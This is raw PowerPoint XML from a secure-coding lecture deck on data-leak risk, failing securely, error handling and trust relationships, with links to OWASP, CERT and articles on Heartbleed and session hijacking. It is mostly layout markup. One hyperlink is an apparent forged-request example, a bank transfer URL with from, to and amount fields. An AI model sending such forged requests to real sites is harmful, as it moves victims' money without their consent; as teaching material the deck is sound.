Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font6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40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide34.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide109.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide130.xml"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide151.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide193.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide197.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2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147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide141.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16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189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18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A207F-0F91-42F2-96D0-049C6003623B}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:t>6/22/2024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67D4A-04CB-4EDF-8FB1-342A02FC8EC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0125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C13F5-F2B1-464B-BE8F-27ABFBD2FBDE}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:t>6/22/2024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1351F-DBB1-4664-ADA9-83BC7CB8848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36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 : http://projects.webappsec.org/w/page/13246995/Web-Hacking-Incident-Database#nbspTopAttackMethodsAllEntries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43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 : http://projects.webappsec.org/w/page/13246995/Web-Hacking-Incident-Database#nbspTopAttackMethodsAllEntries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57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 : http://projects.webappsec.org/w/page/13246995/Web-Hacking-Incident-Database#nbspTopAttackMethodsAllEntries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75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 : https://www.justice.gov/criminal-ccips/ccips-press-releases-2016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02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/>
              <a:t>US-CERT is the Computer Emergency Response Team for the United States</a:t>
            </a:r>
          </a:p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5B53B5-6017-404C-96BD-C45B30AFD00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145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990600"/>
            <a:ext cx="8458200" cy="3200400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13" y="4267200"/>
            <a:ext cx="8458200" cy="1371600"/>
          </a:xfrm>
          <a:noFill/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A58A-F6A3-44B4-8553-CA3EAF252FB7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9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600200">
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="1874520">
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="2148840">
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2423160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513F-1C7D-48A3-9E66-761794785CC6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3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4" y="381000"/>
            <a:ext cx="1904998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381000"/>
            <a:ext cx="8305800" cy="5791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BC340-5827-402A-ABD7-86B6900F77A8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1DEA7-3E79-2F4A-AAF4-25CE14C89C78}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/22/2024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D5E89-28BD-1243-B60C-DBDF9FA887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5256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EFC33-1439-614A-A670-C0AA07D83A93}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/22/2024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CD18A-34CE-9042-8A4B-DCAFFFF83F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46704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1398F-3DFE-8842-91CA-C7797D2CC0B1}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/22/2024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C10AEA-1010-EE4C-8787-1BDB385434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8033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E1CC2-A488-1E46-A77D-5830D5C8F1DE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/22/2024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CA652B-CD7E-1C45-93B0-066A78306A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5150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E467BD-879E-814D-864E-7F2DF2752EF9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/22/2024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637999-E805-9747-960D-DF639D4DED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5121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F4FDE-0F6C-0D47-83AA-4F99EB86A9AE}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/22/2024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ABCFF9-3337-B447-B94F-8B0B60546E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0023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5A8858-79B7-6E45-AB49-1EE401385EED}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/22/2024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1F12FC-22E3-DF45-A97D-7BD127C6DE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5391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BBB63-26BC-6046-89CB-262590EF2D8D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/22/2024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8A6FBA-8700-BE4D-85C3-9480221F3C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7016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BD3E-AD23-4233-B7FD-BCC74AA741B1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E5240-A3C6-DD43-B6AA-10AF529B1A4E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/22/2024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B6193-BE21-8245-A83D-B65B8E73A7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675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BFA1E2-CBED-A241-8BA8-3C6311CCEE17}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/22/2024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665E5-DAC6-2B45-8D8F-B3DD76F499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37517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1A7EC7-90AE-FE40-A8B6-FC707761C963}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/22/2024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B38D65-8D5A-1046-AA5B-BC5726A723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8846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162" y="2125980"/>
            <a:ext cx="1036050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324" y="3840480"/>
            <a:ext cx="85321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95856">
              <a:lnSpc>
                <a:spcPts val="955"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr marL="95856">
                <a:lnSpc>
                  <a:spcPts val="955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7049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99" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="2E549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95856">
              <a:lnSpc>
                <a:spcPts val="955"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr marL="95856">
                <a:lnSpc>
                  <a:spcPts val="955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84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99" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="2E549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6701" y="1800264"/>
            <a:ext cx="3949306" cy="369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99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49948" y="1800265"/>
            <a:ext cx="3838209" cy="369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99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95856">
              <a:lnSpc>
                <a:spcPts val="955"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr marL="95856">
                <a:lnSpc>
                  <a:spcPts val="955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273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99" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="2E549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95856">
              <a:lnSpc>
                <a:spcPts val="955"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr marL="95856">
                <a:lnSpc>
                  <a:spcPts val="955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203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95856">
              <a:lnSpc>
                <a:spcPts val="955"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr marL="95856">
                <a:lnSpc>
                  <a:spcPts val="955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047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2057400"/>
            <a:ext cx="8458201" cy="2666999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4800" b="0" i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876800"/>
            <a:ext cx="8458201" cy="1143000"/>
          </a:xfrm>
          <a:noFill/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85C56-1C19-4454-A6D4-FDB294070137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2" y="1676400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035" y="1676401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AEA3F-BC83-4494-8BB2-CF9729692A8C}" type="datetime1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5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399"/>
            <a:ext cx="4701142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516457"/>
            <a:ext cx="4701142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676399"/>
            <a:ext cx="4703259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516457"/>
            <a:ext cx="4703259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FC3-C38C-4973-9593-9C0AA203E374}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/22/2024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8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0E9B8-A638-47B9-8EAF-A06FB35BB403}" type="datetime1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8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414C0-40BC-46FB-ADE3-F7141007B5FB}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/22/2024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1" y="1676400"/>
            <a:ext cx="3810000" cy="243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3" y="685800"/>
            <a:ext cx="61722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0811" y="4191000"/>
            <a:ext cx="3810000" cy="1524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BC97-2F5E-4770-AEEF-8F2730A3EA80}" type="datetime1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3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2" y="1676400"/>
            <a:ext cx="3810000" cy="2438400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522412" y="0"/>
            <a:ext cx="5943601" cy="6858000"/>
          </a:xfrm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0812" y="4191000"/>
            <a:ext cx="3810000" cy="1524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95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9601200" cy="4495800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178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41B0D41C-F0D3-49F0-8041-67FC705A40C6}" type="datetime1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512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39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8600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1600"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent6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441" y="274638"/>
            <a:ext cx="1096994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441" y="1600201"/>
            <a:ext cx="1096994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B24AD95-F66A-9D42-91B8-FDCF808917F5}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>6/22/2024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B619FB4-FF6F-924A-9F32-F87C746CA6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42470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700" y="417958"/>
            <a:ext cx="524754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2E549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47922" y="1427733"/>
            <a:ext cx="61134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4201" y="6377940"/>
            <a:ext cx="39004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441" y="6377940"/>
            <a:ext cx="280343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47391" y="6479844"/>
            <a:ext cx="262822" cy="128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95856">
              <a:lnSpc>
                <a:spcPts val="955"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr marL="95856">
                <a:lnSpc>
                  <a:spcPts val="955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96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063">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="914126">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1371189">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1828251">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2285314">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2742377">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3199440">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3656503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063">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="914126">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1371189">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1828251">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2285314">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2742377">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3199440">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3656503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hyperlink" Target="http://mybank.com/transfer?from=...&amp;to=...&amp;amt" TargetMode="Externa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wasp.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securityinnovation.com/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://searchsecurity.techtarget.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.us-cert.gov/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://tweakyourbiz.com/growth/files/shutterstock-Goal-setting.jpg" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2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ecurecoding.cert.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp.org/index.php/Secure_Coding_Principles)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://blogs.fsfe.org/mk/files/2014/02/xkcd-standards.png" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15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perkins.org/images/content/pagebuilder/humptydumpty.jp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hyperlink" Target="http://nvd.nist.gov/" TargetMode="Externa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://images.thezooom.com/uploads/2012/08/Dont-reinvent-the-wheel.jpg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hitn.com/images/java/dilbert_codereuse.jpg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Openssl#cite_note-20" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Man-in-the-middle_attack" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Certificate_authority" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Software_bug" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xkcd.com/1354/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Openssl#cite_note-19" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Perfect_forward_secrecy" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Web_servers" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.jpg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Openssl#cite_note-ipsec-22" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Heartbleed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en.wikipedia.org/wiki/Heartbeat_(computing)" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Eavesdropping" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Kilobyte" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Session_hijacking" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Openssl#cite_note-hb-21" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Openssl#cite_note-23" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Transport_Layer_Security" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Public-key_cryptography" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Session_cookie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arnoldzwicky.org/2012/08/07/comic-machines/%26ei%3DdvpLU6HdOuGSyQHJhYHoCA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3.nd.edu/~dlindley/handouts/Do%2520Not%2520Trust%2520Me.JPG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pubs.usgs.gov/gip/dynamic/graphics/monolith.gif" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stanfordhospital.org/clinicsmedServices/COE/neuro/braintumor/images/brain-m37ap.jpg" TargetMode="Externa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rtoonstock.com/newscartoons/cartoonists/lla/lowres/computers-website-" TargetMode="Externa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vagechickens.com/images/chickentrust.jpg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anbarelydraw.com/comic/2039%26ei%3D9D5NU-_fHOamsQTj_IDYAw" TargetMode="Externa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ngm.nationalgeographic.com/wallpaper/img/2010/08/aug10wallpaper-11_1600.jpg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ngm.nationalgeographic.com/wallpaper/img/2010/08/aug10wallpaper-11_1600.jpg" TargetMode="External"/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jsentinel.com/blogs/images/far-side%25202bears(1).jpg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earth.com/wp-content/uploads/supply_chain_sustainability.jpg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Security Coding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Sheikh Nasir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kamarudin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8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cause the greatest impact?</a:t>
            </a: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1293813" y="1676399"/>
            <a:ext cx="10149250" cy="4906497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3838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6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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2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600" dirty="0"/>
              <a:t>What would cause your company to be on an opening segment of news because of a major data leak?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2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600" dirty="0"/>
              <a:t>Identify. Then focus efforts to test that data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1097280" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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6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100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6644551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35" dirty="0"/>
              <a:t>Fail</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Securely</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5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32267"/>
            <a:ext cx="10024039" cy="2185736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26662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If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you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attempt to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open a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file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 operation fails, report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it as an </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-60" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>error,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don't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try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to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find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different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location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5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="81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If an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attacker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uses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Forceful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Browsing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3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file that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controls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access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administrative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resources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9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esou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shoul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denied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Unless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attacker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provide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credentials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101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 Coding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35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Fail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Securely</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="3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-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Security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Design</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" spc="2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20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Pattern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267122"/>
            <a:ext cx="9667262" cy="3786154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Alias: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Fail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Safely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Error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messages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disclose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information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valuable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attacker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Failure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lead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unhandled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state,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which can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lead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denial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service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Unhandled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failures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lead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malicious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behavior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being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unnoticed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Consequences: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con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itions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 handled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gg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 no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erb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m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essages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failure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of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component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doesn't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result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systemic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failure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ailu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esul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secu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102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6986079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spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="1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35" dirty="0"/>
              <a:t>Fail</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Securely</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Tips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9945319" cy="2827553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Don't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assume that an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error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condition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won't occur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It'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wha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ou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assume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Errors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like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accidents,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don't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expect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them,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but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they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happen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Any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code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throw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exception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75" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Try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Block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Handl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ible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x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pti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Finally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Blocks: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leaving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files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open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exceptions</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2199" spc="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defined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after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creates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resource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leaks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possible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failure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Short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specific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75" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Try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Blocks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give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more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control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over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error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state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648" y="668993"/>
            <a:ext cx="10512862" cy="12536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99">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90143">
              <a:spcBef>
                <a:spcPts val="2714"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Creating</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2699" spc="-5" dirty="0"/>
              <a:t>Principles</a:t>
            </a:r>
            <a:endParaRPr sz="2699"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1253417" y="2639427"/>
            <a:ext cx="3537299" cy="739582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="35551" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="23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399" spc="-2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By</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-2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srgbClr val="2E5496"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Communication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60"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1999" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1999" spc="-5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srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Relationships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104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4707747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50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="7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55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Relationships</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5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32268"/>
            <a:ext cx="9982140" cy="2914526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5078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Principle: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in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outside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or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Third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Party</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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entities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must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established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maintained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1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Corollary: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Nothing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outside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45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Boundaries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safe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Corollary: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can't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others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Corollary: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Even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most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communication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has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weaknesses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Most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systems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any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value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will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do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one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more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these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x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ch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nge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wit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lient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s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ystem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x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ch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nge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wit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Thi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60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ar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sy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tem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105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4707747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50" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
